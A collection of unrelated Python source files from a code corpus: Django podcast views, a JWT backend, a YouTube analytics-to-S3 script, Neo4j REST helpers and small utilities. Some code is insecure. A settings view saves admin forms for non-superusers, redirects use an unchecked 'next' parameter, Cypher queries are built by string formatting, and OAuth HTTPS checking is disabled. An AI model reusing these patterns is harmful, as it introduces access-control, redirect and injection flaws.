Podcast.objects.get_or_create_from_feed_url(feed)\n if podcast is not None:\n podcast.add_subscriber(request.user.listener)\n podcast.add_follower(request.user.listener)\n\n if form.cleaned_data['feed_url'] and not form.cleaned_data['opml_file']:\n return redirect('podcasts:podcasts-details', slug=podcast.slug)\n else:\n return redirect('podcasts:podcasts-list')\n\n else:\n form = NewFromURLForm()\n discovery = None\n\n url = 'https://rss.itunes.apple.com/api/v1/us/podcasts/top-podcasts/all/25/explicit.json'\n response = requests.get(url)\n\n if response.status_code >= 400:\n discovery = None\n else:\n discovery = json.loads(response.content)\n discovery['feeds'] = list(chunks(discovery['feed']['results'][:15], 5))\n discovery['aggregator'] = discovery['feed']['author']['name']\n discovery['copyright'] = discovery['feed']['copyright']\n\n context = {\n 'form': form,\n 'discovery': discovery,\n }\n return render(request, 'podcasts-new.html', context)\n\n\ndef podcasts_details(request, slug):\n podcast = get_object_or_404((\n Podcast.objects\n .prefetch_related('episodes', 'episodes')\n .prefetch_related('subscribers', 'subscribers'))\n .annotate(num_episodes=Count('episodes'))\n .annotate(downloaded_episodes=Count(Case(\n When(episodes__downloaded__isnull=False, then=1))))\n .annotate(last_episode_date=Max('episodes__published')),\n slug=slug)\n\n user_ordering = request.user.listener.sort_order_episodes\n\n user_is_subscriber = podcast.subscribers.filter(user=request.user).exists()\n episodes = podcast.episodes.order_by(user_ordering)[:10]\n\n context = {\n 'user_is_subscriber': user_is_subscriber,\n 'podcast': podcast,\n 'episodes': episodes,\n }\n return render(request, 'podcasts-details.html', context)\n\n\nclass PodcastDeleteView(DeleteView):\n model = Podcast\n context_object_name = 'podcast'\n success_url = reverse_lazy('podcasts:podcasts-list')\n template_name = 'podcasts/podcast_check_delete.html'\n\n\ndef podcasts_refresh_feed(request, slug):\n podcast = get_object_or_404(Podcast, slug=slug)\n podcast.update(update_all=True)\n next = request.GET.get('next', '/')\n return redirect(next)\n\n\ndef settings(request):\n current_site_settings = get_current_site(request)\n current_podcasts_settings = current_site_settings.podcastssettings\n if request.method == 'POST':\n listener_form = ListenerSettingsForm(\n request.POST,\n request.FILES,\n instance=request.user.listener,\n prefix='listener')\n app_admin_form = AdminSettingsForm(\n request.POST,\n request.FILES,\n instance=current_podcasts_settings,\n prefix='app')\n site_admin_form = SiteSettingsForm(\n request.POST,\n request.FILES,\n instance=current_site_settings,\n prefix='site')\n\n if listener_form.is_valid() and (not request.user.is_superuser or (app_admin_form.is_valid() and site_admin_form.is_valid())):\n listener_form.save()\n app_admin_form.save()\n site_admin_form.save()\n\n next = request.GET.get('next', '/')\n return redirect(next)\n else:\n listener_form = ListenerSettingsForm(\n instance=request.user.listener,\n prefix='listener')\n app_admin_form = AdminSettingsForm(\n instance=current_podcasts_settings,\n prefix='app')\n site_admin_form = SiteSettingsForm(\n instance=current_site_settings,\n prefix='site')\n\n return render(request, 'podcasts-settings.html', {'listener_form': listener_form,\n 'app_admin_form': app_admin_form,\n 'site_admin_form': site_admin_form})\n","sub_path":"podcasts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"11037398","text":"##\n## Imprima el valor maximo y minimo por cada letra de la columa 1.\n##\n## A,9,1\n## B,9,1\n## C,9,0\n## D,7,1\n## E,9,1\n##\ntxt = open('data.csv','r').readlines()\ntxt = [row[0:-1]for row in txt]\ntxt = [line.replace('\\t','')for line in txt]\nc = sorted(set([row[0]for row in txt]))\ns = [[row[0],row[1]]for row in txt]\naa =0\nfor i in c:\n aa = [row[1] for row in s[:]if row[0]==i]\n maximo = max(aa)\n minimo = min(aa)\n print(i+','+maximo+','+minimo)\n \n","sub_path":"q05.py","file_name":"q05.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"205811738","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = u'tu1978'\nSITENAME = u'思いつきメモ'\nSITEURL = 'https://formalism.github.io/blog/'\n\nPATH = 'content'\n\nTIMEZONE = 'Asia/Tokyo'\n\nDEFAULT_LANG = u'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\nSLUGIFY_SOURCE = 'basename'\n\nARTICLE_URL = 'posts/{date:%Y}/{date:%m}/{slug}/'\nARTICLE_SAVE_AS = 'posts/{date:%Y}/{date:%m}/{slug}/index.html'\nPAGE_URL = 'pages/{date:%Y}/{date:%m}/{slug}/'\nPAGE_SAVE_AS = 'pages/{date:%Y}/{date:%m}/{slug}/index.html'\n\nTHEME = \"./pelican-themes/bootstrap\"\n\nDISPLAY_PAGES_ON_MENU = True\nNEWEST_FIRST_ARCHIVES = True\n\nGOOGLE_ANALYTICS = True\n\n#SUMMARY_MAX_LENGTH = None\n\n# Blogroll\n# LINKS = (('Pelican', 'http://getpelican.com/'),\n# ('Python.org', 'http://python.org/'),\n# ('Jinja2', 'http://jinja.pocoo.org/'),\n# ('You can modify those links in your config file', '#'),)\n\n# Social widget\nSOCIAL = (('twitter', 'http://twitter.com/tu1978'),)\n\nDEFAULT_PAGINATION = 10\n\n# Uncomment following line if you want document-relative URLs when developing\n#RELATIVE_URLS = True\n\nUSE_FOLDER_AS_CATEGORY = False\n\nTWITTER_USERNAME=\"@tu1978\"\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"630741122","text":"import asyncio\nfrom datetime import datetime, timedelta\nfrom typing import Optional\n\nimport jwt\n\nfrom authx.core.config import JWT_ALGORITHM\nfrom authx.database import RedisBackend\n\n\nclass JWTBackend:\n \"\"\"\n Setup the JWT Backend with the given cache backend and private key.\n \"\"\"\n\n def __init__(\n self,\n cache_backend: RedisBackend,\n private_key: Optional[bytes],\n public_key: bytes,\n access_expiration: int,\n refresh_expiration: int,\n ) -> None:\n self._cache = cache_backend\n self._private_key = private_key\n self._public_key = public_key\n self._access_expiration = access_expiration\n self._refresh_expiration = refresh_expiration\n\n async def _active_blackout_exists(self, iat: datetime) -> bool:\n blackout = await self._cache.get(\"users:blackout\")\n if blackout is not None:\n blackout_ts = datetime.utcfromtimestamp(int(blackout))\n return blackout_ts >= iat\n else:\n return False\n\n async def _user_in_blacklist(self, id: int) -> bool:\n in_blacklist = await self._cache.get(f\"users:blacklist:{id}\")\n return bool(in_blacklist)\n\n async def _user_in_logout(self, id: int, iat: datetime) -> bool:\n ts = await self._cache.get(f\"users:kick:{id}\")\n if ts is not None:\n logout_ts = datetime.utcfromtimestamp(int(ts))\n return logout_ts >= iat\n else:\n return False\n\n async def decode_token(self, token: str, leeway: int = 0) -> Optional[dict]:\n if token:\n try:\n payload = jwt.decode(\n token,\n self._public_key,\n leeway=leeway,\n algorithms=JWT_ALGORITHM,\n )\n id = payload.get(\"id\")\n iat = datetime.utcfromtimestamp(int(payload.get(\"iat\")))\n checks = await asyncio.gather(\n *(\n self._active_blackout_exists(iat),\n self._user_in_blacklist(id),\n self._user_in_logout(id, iat),\n )\n )\n if any(checks):\n return None\n\n return payload\n except: # noqa E722\n return None\n return None\n\n def _create_token(\n self, payload: dict, token_type: str, expiration_delta: Optional[int] = None\n ) -> str:\n iat = datetime.utcnow()\n if expiration_delta:\n exp = datetime.utcnow() + timedelta(seconds=expiration_delta)\n else:\n exp = datetime.utcnow() + timedelta(seconds=60)\n\n payload.update({\"iat\": iat, \"exp\": exp, \"type\": token_type})\n token = jwt.encode(payload, self._private_key, algorithm=JWT_ALGORITHM)\n if isinstance(token, bytes):\n # For PyJWT <= 1.7.1\n return token.decode(\"utf-8\")\n # For PyJWT >= 2.0.0a1\n return token\n\n def create_access_token(self, payload: dict) -> str:\n return self._create_token(payload, \"access\", self._access_expiration)\n\n def create_refresh_token(self, payload: dict) -> str:\n return self._create_token(payload, \"refresh\", self._refresh_expiration)\n\n def create_tokens(self, payload: dict) -> dict:\n access = self.create_access_token(payload)\n refresh = self.create_refresh_token(payload)\n\n return {\"access\": access, \"refresh\": refresh}\n","sub_path":"authx/core/jwt.py","file_name":"jwt.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"71031183","text":"# coding: utf-8\n\nimport os\nimport os.path\nimport numpy as np\nimport pickle\nimport cv2\n\nurl_mnist = 'http://yann.lecun.com/exdb/mnist/'\ndata_file = os.path.dirname(os.path.abspath(__file__)) + \"/mnist.pkl\"\n\nn_train = 60000\nn_test = 10000\ndim_img = (1, 28, 28)\nsize_img = 784\n\ndef load_mnist(normalize=True, flatten=True, one_hot_label=False):\n \"\"\" Load and preprocess MNIST dataset \n Parameters:\n - normalize: normalize image pixel values between 0.0 and 1.0\n - one_hot_label: \n True: one_hot_label is returned as one-hot array\n ** One_hot array: ex) [0,0,0,0,1,0,0,0,0]\n - flatten: convert images into one dimensional array\n\n Returns: (training image, trainign label), (test image, test label)\n \"\"\"\n with open(data_file, 'rb') as f: # 'rb': open a file in binary format\n dataset = pickle.load(f)\n\n if normalize:\n for key in ('train_img', 'test_img'):\n dataset[key] = dataset[key].astype(np.float32)\n dataset[key] /= 255.0\n\n if one_hot_label:\n dataset['train_label'] = _change_one_hot_label(dataset['train_label'])\n dataset['test_label'] = _change_one_hot_label(dataset['test_label'])\n\n if not flatten:\n for key in ('train_img', 'test_img'):\n dataset[key] = dataset[key].reshape(-1, 1, 28, 28)\n\n return (dataset['train_img'], dataset['train_label']), (dataset['test_img'], dataset['test_label'])\n\n\ndef _change_one_hot_label(X):\n T = np.zeros((X.size, 10))\n for idx, row in enumerate(T):\n row[X[idx]] = 1\n\n return T\n\nif __name__ == '__main__':\n print('This is a module for preprocessing MNIST dataset')","sub_path":"dataset/preprocess_mnist.py","file_name":"preprocess_mnist.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"484504599","text":"import os\nimport argparse\nimport pandas as pd\nimport boto3\nimport logging\nimport datetime\nfrom googleapiclient.discovery import build\nfrom oauth2client import client\nfrom oauth2client import tools\nfrom oauth2client.file import Storage\n\nSCOPES = ['https://www.googleapis.com/auth/yt-analytics.readonly']\nAPI_SERVICE_NAME = 'youtubeAnalytics'\nAPI_VERSION = 'v2'\n\nCLIENT_SECRETS_FILE = '/Users/scoyne/Documents/GitHub/lib-global-analytics/Secrets/client_secret.json'\nCLIENT_AUTH_TOKEN = '/Users/scoyne/Documents/GitHub/lib-global-analytics/Secrets/youtube_reporting_credentials.json'\nCOLUMNS = ['audienceWatchRatio', 'relativeRetentionPerformance', 'views']\n\n\nS3_BUCKET = 'teamanalytics'\nTODAY = datetime.datetime.now()\nDEFAULT_START_DATE = '2010-01-01'\nDEFAULT_END_DATE = TODAY\nFILE_NAME = 'youtube_reporting_by_video_{}.csv'.format(TODAY)\n\n# setup logging\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\ndef valid_date(s):\n try:\n return datetime.datetime.strptime(s, \"%Y-%m-%d\")\n except ValueError:\n msg = \"Not a valid date: '{0}'.\".format(s)\n raise argparse.ArgumentTypeError(msg)\n\n\ndef get_parser():\n # parse arguments\n parser = argparse.ArgumentParser(\n description=\"Automatically generate youtube analytics report and upload to S3\"\n )\n parser.add_argument(\n \"--start_date\",\n action=\"store\",\n dest=\"start_date\",\n type=valid_date,\n help=\"The start date of the youtube report, format must be yyyy-mm-dd\",\n default=DEFAULT_START_DATE,\n )\n parser.add_argument(\n \"--end_date\",\n action=\"store\",\n dest=\"end_date\",\n type=valid_date,\n help=\"The end date of the youtube report, format must be yyyy-mm-dd\",\n default=DEFAULT_END_DATE,\n )\n return parser\n\n\ndef upload_to_s3(inputFile, outputFile, bucket):\n logger.info(\"Start upload to S3 process\")\n # Create an S3 client\n s3 = boto3.client('s3')\n # Uploads the given file using a managed uploader, which will split up large\n # files automatically and upload parts in parallel.\n s3.upload_file(inputFile, bucket, outputFile)\n logger.info(\"End upload to S3 process\")\n\n\ndef get_authenticated_service():\n logger.info(\"Start authentication process\")\n\n credential_path = CLIENT_AUTH_TOKEN\n store = Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRETS_FILE, SCOPES)\n credentials = tools.run_flow(flow, store)\n\n logger.info(\"End authentication process\")\n return build(API_SERVICE_NAME, API_VERSION, credentials=credentials)\n\n\ndef execute_api_request(client_library_function, **kwargs):\n result = client_library_function(**kwargs).execute()\n return result\n\n\ndef save_report_to_csv(result, columns, filename):\n logger.info(\"Start save to csv process\")\n data = result['rows']\n header = ['video'] + columns\n df = pd.DataFrame(data, columns=header)\n df.to_csv(filename)\n logger.info(\"End save to csv process\")\n\n\ndef main(args):\n startDate = args.start_date.date()\n endDate = args.end_date.date()\n\n # Disable OAuthlib's HTTPs verification when running locally.\n # *DO NOT* leave this option enabled when running in production.\n os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'\n\n youtubeAnalytics = get_authenticated_service()\n\n stringColumns = \",\".join(COLUMNS)\n\n report = execute_api_request(\n youtubeAnalytics.reports().query,\n ids='channel==MINE',\n startDate=startDate,\n endDate=endDate,\n metrics=stringColumns,\n dimensions='video==Nl5ELeRtrcY',\n )\n\n save_report_to_csv(report, COLUMNS, FILE_NAME)\n\n outputFile = 'analytics_report/marketing/youtube/{}'.format(FILE_NAME)\n upload_to_s3(FILE_NAME, outputFile, S3_BUCKET)\n\n\nif __name__ == \"__main__\":\n main(get_parser().parse_args())\n","sub_path":"youtube_video_report.py","file_name":"youtube_video_report.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"44934763","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(help_text=b'This is used in the admin only', max_length=200)),\n ('status', models.IntegerField(default=1, help_text=b'What is the status of this object', max_length=1, choices=[(0, b'DISABLED'), (1, b'LIVE'), (2, b'STAGED'), (3, b'DELETED')])),\n ('slug', models.SlugField(help_text=b'This must be unique, if you leave this blank a slug will be generated', null=True, blank=True)),\n ('date_created', models.DateTimeField(auto_now_add=True, null=True)),\n ('title', models.CharField(help_text=b'', max_length=500, null=True, blank=True)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='thing',\n name='category',\n field=models.ForeignKey(blank=True, to='app.Category', null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"app/migrations/0002_auto_20150313_1948.py","file_name":"0002_auto_20150313_1948.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"101652971","text":"import ddtrace\n\n\ndef get_correlation_ids(tracer=None):\n \"\"\"Retrieves the Correlation Identifiers for the current active ``Trace``.\n This helper method can be achieved manually and should be considered\n only a shortcut. The main reason is to abstract the current ``Tracer``\n implementation so that these identifiers can be extracted either the\n tracer is an OpenTracing tracer or a Datadog tracer.\n\n OpenTracing users can still extract these values using the ``ScopeManager``\n API, though this shortcut is a simple one-liner. The usage is:\n\n from ddtrace import helpers\n\n trace_id, span_id = helpers.get_correlation_ids()\n\n :returns: a tuple containing the trace_id and span_id\n \"\"\"\n # Consideration: currently we don't have another way to \"define\" a\n # GlobalTracer. In the case of OpenTracing, ``opentracing.tracer`` is exposed\n # and we're doing the same here for ``ddtrace.tracer``. Because this helper\n # must work also with OpenTracing, we should take the right used ``Tracer``.\n # At the time of writing, it's enough to support our Datadog Tracer.\n\n # If no tracer passed in, use global tracer\n if not tracer:\n tracer = ddtrace.tracer\n\n # If tracer is disabled, skip\n if not tracer.enabled:\n return None, None\n\n span = tracer.current_span()\n if not span:\n return None, None\n return span.trace_id, span.span_id\n","sub_path":"ddtrace/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"162960937","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.contrib import messages\nfrom datetime import datetime\nfrom django.views import View\nfrom systemconfig.models import Country\nfrom systemconfig.forms.country_form import *\n\n\nclass addCountry(View):\n form_class = CountryForm\n\n def get(self, request):\n page_title = \"Add New Country\"\n form = self.form_class\n return render(request, 'country/countryform.html', {'form': form, 'page_title': page_title})\n\n\nclass saveCountry(View):\n form_class = CountryForm\n\n def post(self, request):\n if request.method == 'POST':\n page_title = \"Add New Country\"\n form = self.form_class(request.POST)\n if form.is_valid():\n obj = Country()\n obj.country_name = form.cleaned_data['country_name']\n obj.status = form.cleaned_data['status']\n obj.created_by = request.user.id\n obj.created_at = datetime.now()\n obj.save()\n messages.success(request, 'Country details saved successfully..!')\n return HttpResponseRedirect('/admin/list/country')\n\n else:\n form = self.form_class()\n messages.error(request, 'Error..!')\n return render(request, 'country/countryform.html', {'form': form, page_title: 'page_title'})\n\n\nclass editCountry(View):\n def get(self, request, **kwargs):\n page_title = \"Edit Country\"\n\n country_details = Country.objects.get(id=self.kwargs['edit_id'])\n form_class = CountryForm\n if request.method == 'POST':\n form = form_class(request.POST)\n else:\n form = form_class()\n return render(request, 'country/countryform.html',\n {'form': form, 'page_title': page_title, 'country_details': country_details})\n\n\nclass updateCountry(View):\n form_class = CountryForm\n\n def post(self, request, **kwargs):\n id = request.POST.get('id')\n form = self.form_class(request.POST)\n if form.is_valid():\n country_name = form.cleaned_data['country_name']\n status = form.cleaned_data['status']\n updated_by = request.user.id\n updated_at = datetime.now()\n Country.objects.filter(id=id).update(country_name=country_name, status=status, updated_by=updated_by,\n updated_at=updated_at)\n messages.success(request, 'Country details updated successfully..!')\n return HttpResponseRedirect('/admin/list/country')\n return HttpResponse(\"UpdateCountry\")\n","sub_path":"systemconfig/views/country.py","file_name":"country.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"10868989","text":"import pygame\nfrom pygame.locals import *\n\npygame.init()\n\npygame.mixer.music.load(\"Suoni/colonnaSonora.mp3\")\npygame.mixer.music.play(-1) #play della colonna sonora\npygame.mixer.music.set_volume(0.6)\n\n#creo suono click\nsound1 = pygame.mixer.Sound(\"Suoni/click.wav\")\n\n#aggiorno lo schermo\npygame.display.flip()\n\n#ciclo while che si chiude quando l'utente chiude il programma\ndone = False\nwhile not done:\n for ev in pygame.event.get():\n if ev.type == QUIT: # chiusura del programma\n done = True\n elif ev.type == MOUSEBUTTONDOWN: # click del mouse\n click=ev.pos\n tastoMouse=ev.button\n if tastoMouse==1:\n sound1.play() #play suono click\n # if ButtonMuto.collidepoint(click) and tastoMouse==1:\n # pygame.mixer.music.fadeout(5000) #si ferma la colonna sonora\n\n\n\n\n\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n","sub_path":"giocoV0.2/Suoni/suoni.py","file_name":"suoni.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"214726965","text":"import cv2\nimport os\n\n\nclass FileCapture:\n def __init__(self, im_dir):\n self.open(im_dir)\n\n def isOpened(self):\n return self._imgs is not None\n\n def read(self):\n if not self.isOpened():\n return False, None\n\n # read files until an image is loaded\n im = None\n while len(self._imgs) > 0 and im is None:\n # not empty image list and no image is read\n im = cv2.imread(os.path.join(self._im_dir, self._imgs[0]), -1)\n del self._imgs[0]\n\n return im is not None, im\n\n def open(self, im_dir):\n if os.path.isdir(im_dir):\n self._im_dir = im_dir\n self._imgs = [f for f in os.listdir(self._im_dir)\n if os.path.isfile(os.path.join(self._im_dir, f))]\n self._imgs.sort()\n else:\n self._imgs = None\n","sub_path":"captures.py","file_name":"captures.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"8759907","text":"#!/usr/bin/env python3\n\nimport requests\nimport json\nimport warnings\nimport re\nimport time\nfrom datetime import datetime, timedelta\nimport math\n#import token\nimport argparse\n\n\n'''\nCreated on 4 Feb 2016\n\nTools for connecting to the neo4j REST API\n\n@author: davidos\n'''\n\n#Could also use py2neo, but this is a bit heavy duty for some uses\n\n\ndef cli_credentials():\n \"\"\"Parses command line credentials for Neo4J rest connection;\n Optionally specifcy additional args as a list of dicts with\n args required by argparse.add_argument(). Order in list\n specified arg order\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"endpoint\",\n help=\"Endpoint for connection to neo4J prod\")\n parser.add_argument(\"usr\",\n help=\"username\")\n parser.add_argument(\"pwd\",\n help=\"password\")\n# if additional_args:\n# for a in additional_args:\n# parser.add_argument(**a) # how to get this to work with non kewyord args\n return parser.parse_args()\n\ndef cli_neofj_connect():\n args = cli_credentials()\n return neo4j_connect(base_uri=args.endpoint,\n usr=args.usr,\n pwd=args.pwd)\n\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i+n]\n \n\n \nclass neo4j_connect():\n \"\"\"Thin layer over REST API to hold connection details, \n handle multi-statement POST queries, return results and report errors.\"\"\"\n # Return results might be better handled in the case of multiple statements - especially when chunked.\n # Not connection with original query is kept.\n \n \n def __init__(self, base_uri, usr, pwd):\n self.base_uri=base_uri\n self.usr = usr\n self.pwd = pwd\n self.commit = \"/db/neo4j/tx/commit\"\n self.headers = {'Content-type': 'application/json'}\n if not self.test_connection():\n print(\"Falling back to Neo4j v3 connection\")\n self.commit = \"/db/data/transaction/commit\"\n self.headers = {}\n self.test_connection()\n \n def commit_list(self, statements, return_graphs = False):\n \"\"\"Commit a list of statements to neo4J DB via REST API.\n Prints requests status and warnings if any problems with commit.\n - statements = list of cypher statements as strings\n - return_graphs, optionally specify graphs to be returned in JSON results.\n Errors prompt warnings, not exceptions, and cause return = FALSE.\n Returns results list of results or False if any errors are encountered.\"\"\"\n cstatements = []\n if return_graphs:\n for s in statements:\n cstatements.append({'statement': s, \"resultDataContents\" : [ \"row\", \"graph\" ]})\n else: \n for s in statements:\n cstatements.append({'statement': s}) # rows an columns are returned by default.\n payload = {'statements': cstatements}\n response = requests.post(url = \"%s%s\" \n % (self.base_uri, self.commit), auth = (self.usr, self.pwd) ,\n data = json.dumps(payload), headers = self.headers)\n if self.rest_return_check(response):\n return response.json()['results']\n else:\n return False\n \n \n def commit_list_in_chunks(self, statements, verbose=False, chunk_length=1000):\n \"\"\"Commit a list of statements to neo4J DB via REST API, split into chunks.\n cypher_statments = list of cypher statements as strings\n base_uri = base URL for neo4J DB\n Default chunk size = 1000 statements. This can be overridden by KWARG chunk_length.\n Returns a list of results. Output is indistinguishable from output of commit_list (i.e. \n chunking is not reflected in results list).\n \"\"\"\n chunked_statements = chunks(l = statements, n=chunk_length)\n chunk_results = []\n i = 1\n c_no = math.ceil(len(statements)/chunk_length)\n for c in chunked_statements:\n if verbose:\n start_time = time.time()\n print(\"Processing chunk of %d of %d starting with: %s\" % (i,\n c_no, \n c[0].encode('utf8')))\n r = self.commit_list(c)\n if verbose:\n t = time.time() - start_time\n print(\"Processing took %d seconds for %s statements\" % (t, len(c)))\n print(\"Estimated time to completion: %s.\" % str(timedelta(seconds=(t*(c_no - i)))))\n if type(r) == list:\n chunk_results.extend(r)\n else:\n chunk_results.append(r)\n i += 1\n return chunk_results\n\n def commit_csv(self, url, statement, chunk_size=1000, sep=\",\"):\n # May need some configuration to work with file://...\n cypher = \"USING PERIODIC COMMIT %d \" \\\n \"LOAD CSV WITH HEADERS FROM '%s' AS line FIELDTERMINATOR '%s' \" \\\n \"%s\" % (chunk_size, url, sep, statement)\n self.commit_list([cypher])\n\n def rest_return_check(self, response):\n \"\"\"Checks status response to post. Prints warnings to STDERR if not OK.\n If OK, checks for errors in response. Prints any present as warnings to STDERR.\n Returns True STATUS OK and no errors, otherwise returns False.\n \"\"\"\n if not (response.status_code == 200):\n warnings.warn(\"Connection error: %s (%s)\" % (response.status_code, response.reason))\n return False\n else:\n j = response.json()\n if j['errors']:\n for e in j['errors']:\n warnings.warn(str(e))\n return False\n else:\n return True\n \n def test_connection(self):\n statements = [\"MATCH (n) RETURN n LIMIT 1\"]\n if self.commit_list(statements):\n return True\n else:\n return False\n \n def list_all_node_props(self):\n r = self.commit_list(['MATCH (n) with keys(n) AS kl UNWIND kl as k RETURN DISTINCT k'])\n d = results_2_dict_list(r)\n return [x['k'] for x in d]\n \n def list_all_edge_props(self):\n r = self.commit_list(['MATCH ()-[r]-() with keys(r) AS kl UNWIND kl as k RETURN DISTINCT k'])\n d = results_2_dict_list(r)\n return [x['k'] for x in d]\n \ndef results_2_dict_list(results):\n \"\"\"Takes JSON results from a neo4J query and turns them into a list of dicts.\n \"\"\"\n dc = []\n for n in results:\n # Add conditional to skip any failures\n if n:\n for d in n['data']:\n dc.append(dict(zip(n['columns'], d['row'])))\n return dc\n\ndef escape_string(strng):\n if type(strng) == str:\n strng = re.sub(r'\\\\', r'\\\\\\\\', strng)\n strng = re.sub('\"', '\\\\\"', strng)\n return strng\n\ndef dict_2_mapString(d):\n \"\"\"Converts a Python dict into a cypher map string.\n Only supports values of type: int, float, list, bool, string.\"\"\"\n # Surely one of the fancier libraries comes with this built in!\n map_pairs = []\n for k,v in d.items(): \n if type(v) == (int):\n map_pairs.append(\"%s : %d\" % (k,v))\n elif type(v) == float: \n map_pairs.append(\"%s : %f \" % (k,v)) \n elif type(v) == str:\n map_pairs.append('%s : \"%s\"' % (k, escape_string(v))) \n elif type(v) == list: \n map_pairs.append('%s : %s' % (k, str([escape_string(i) for i in v])))\n elif type(v) == bool:\n map_pairs.append(\"%s : %s\" % (k, str(v))) \n else: \n warnings.warn(\"Can't use a %s as an attribute value in Cypher. Key %s Value :%s\" \n % (type(v), k, (str(v))))\n \n return \"{ \" + ' , '.join(map_pairs) + \" }\"\n\nclass neo4jContentMover:\n \"\"\"A wrapper for methods that safely move content between two neo4J databases.\n Limitation: The database being pulled from must be Neo4j 3.n + (2.n lacks\n the properties function used here).\"\"\"\n \n def __init__(self, From, To):\n \"\"\"From: a neo4jConnect object for interacting with a neo4j DB to pull content from (neo 3.n+)\n To: a neo4jConnect object for interacting with a neo4j DB to load content (2.n+)\"\"\"\n self.From = From\n self.To = To\n \n def move_nodes(self, match, key, chunk_length = 2000, verbose = True, test_mode = False):\n \"\"\"match = any match statement in which a node to move is specified with variable n.\n key = attribute used in merge statements to non-redundantly add content. must be present\n in matched nodes.\n Optionally set commit chunk length, verbosity, test mode (limit 100)\n\n WARNING: THIS DEPENDS ON MATCH BETWEEN SETS OF LABELS. => potential danger of duplicate content.\n \"\"\"\n # TODO: modify this so that MERGE does not specify label. Then adds labels string afterwards.\n \n ret = \" RETURN n.%s AS key, labels(n) AS labels , \" \\\n \"properties(n) as properties\" % key\n \n\n if test_mode:\n ret += \" limit 100\" \n results = self.From.commit_list([match + ret]) \n nodes = results_2_dict_list(results)\n s = []\n for n in nodes:\n attribute_map = dict_2_mapString(n['properties'])\n label_string = ':'.join(n['labels'])\n s.append('MERGE (n:%s { %s : \"%s\" }) SET n = %s' % (label_string, \n key, n['properties'][key], \n attribute_map)) \n self.To.commit_list_in_chunks(statements = s,\n verbose = verbose,\n chunk_length = chunk_length)\n \n def move_edges(self, match, node_key, edge_key='', chunk_length=2000,\n verbose=True, test_mode=False, fail_mode = 'soft'):\n \"\"\"\n Identifies edges in 'from' based on match statement;\n Merges identified edges in to 'to' using combination of specified key match and\n neo4j labels of matched nodes.\n match = any match statement in which an edge (triple) is specified with variables s,r,o\n node_key = key used to match/merge to add new content\n Optionally set commit chunk length.\n \"\"\"\n\n ret = \"RETURN s.%s AS subject, labels(s) as slab, type(r) AS reltype, \" \\\n \"properties(r) AS relprops, o.%s AS object, labels(o) AS olab \" % (node_key, node_key)\n if test_mode:\n ret += \" limit 100\"\n results = self.From.commit_list([match + ret])\n if not results:\n if fail_mode == 'hard':\n raise Exception(\"fubar\")\n elif fail_mode == 'soft':\n warnings.warn(\"Commit to KB return false. Likely connection or cypher error.\")\n else:\n edges = results_2_dict_list(results)\n s = []\n for e in edges:\n attribute_map = dict_2_mapString(e['relprops'])\n rel = e['reltype']\n slab_string = ':'+':'.join(e['slab'])\n olab_string = ':'+':'.join(e['olab'])\n if edge_key:\n if edge_key in e['relprops'].keys():\n edge_restriction = \"{ %s : '%s' }\" % (edge_key, e['relprops'][edge_key])\n else:\n # Make this into an exception?\n warnings.warn(\"Matched edge lacks specified edge_key (%s)\" % (edge_key))\n continue\n else:\n edge_restriction = \"\"\n ### Move edge only when subject and object nodes match on keys and labels.\n emerge = \"MATCH (s%s { %s : '%s'}), \" \\\n \" (o%s { %s : '%s'}) \" \\\n \"MERGE (s)-[r:%s %s]->(o) \" % \\\n (slab_string, node_key, e['subject'],\n olab_string, node_key, e['object'],\n rel, edge_restriction\n )\n if e['relprops']:\n emerge = emerge + \"SET r = %s\" % attribute_map\n 